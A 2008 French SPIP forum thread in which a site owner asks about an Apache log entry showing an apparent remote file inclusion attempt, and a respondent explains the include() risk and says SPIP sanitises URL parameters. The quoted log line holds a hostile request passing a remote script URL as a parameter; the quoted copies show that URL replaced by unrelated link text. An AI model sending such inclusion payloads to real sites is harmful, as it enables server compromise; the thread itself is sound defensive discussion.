[1.8.3] include php, erreur dans le log, probl?me (?)

Frederic_Steczycki_A · Février 5, 2008, 9:01

Bonjour,

en regardant les log apache de notre serveur web, je tombe la dessus :

85.69.54.45 - - [05/Feb/2008:09:27:25 +0100] "GET
/article.php3?id_article=http://ninaru.hut2.ru/images/cs.txt? HTTP/1.1" 200
8527 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

ce qui me laisse quelque peu perplexe, je ne suis pas un vrai administrateur
serveur et m'interroge.

Après recherche je tombe la dessus :
http://www.tux-planet.fr/blog/?2007/05/17/137-faille-php-avec-la-fonction-include

SPIP est il sensible à ce genre d'attaque?

et si oui, que faire ?

Merci
Fred

denisb1 · Février 5, 2008, 9:59

Frédéric Steczycki [AtoutFox] wrote:

85.69.54.45 - - [05/Feb/2008:09:27:25 +0100] "GET
/article.php3?id_article=Справочник организаций города Москвы (Россия) - Отзывы.com? HTTP/1.1" 200
8527 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

bah c'est juste pour (tenter de) créer sur ta page un lien vers les sites du zozo (améliorer son page rank ?).

Après recherche je tombe la dessus :
http://www.tux-planet.fr/blog/?2007/05/17/137-faille-php-avec-la-fonction-include

concerne l'utilisation de la fonction include d'un *fichier* passé en get

en gros : il ne faut jamais faire un include('fichier') où fichier est directement récupéré de l'url

éviter aussi de travailler avec un php.ini où 'register_globals = On'

SPIP est il sensible à ce genre d'attaque?

non

spip récupère des valeurs de variables passées par l'url (en get donc) et les nettoie avant que de les utiliser

l'url : /?page=ma_page ne déclenche pas un include('ma_page') ;
de même
/article.php3?id_article=39 ne déclenche pas un include('39')

Frederic_Steczycki_A · Février 5, 2008, 10:07

Merci pour la réponse.
Il me semblait bien avoir compris que le paramétre est un identifiant
d'enreg sur une table mysql et ne peut en aucun cas etre une URL directe
mais je voulais m'en assurer.
Fred

"denisb" <denisb@laposte.net> a écrit dans le message de news:
fo9bre$egc$1@ger.gmane.org...
Frédéric Steczycki [AtoutFox] wrote:

85.69.54.45 - - [05/Feb/2008:09:27:25 +0100] "GET
/article.php3?id_article=Справочник организаций города Москвы (Россия) - Отзывы.com? HTTP/1.1"
200
8527 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

bah c'est juste pour (tenter de) créer sur ta page un lien vers les
sites du zozo (améliorer son page rank ?).

Après recherche je tombe la dessus :
http://www.tux-planet.fr/blog/?2007/05/17/137-faille-php-avec-la-fonction-include

concerne l'utilisation de la fonction include d'un *fichier* passé en get

en gros : il ne faut jamais faire un include('fichier') où fichier est
directement récupéré de l'url

éviter aussi de travailler avec un php.ini où 'register_globals = On'

SPIP est il sensible à ce genre d'attaque?

non

spip récupère des valeurs de variables passées par l'url (en get donc)
et les nettoie avant que de les utiliser

l'url : /?page=ma_page ne déclenche pas un include('ma_page') ;
de même
/article.php3?id_article=39 ne déclenche pas un include('39')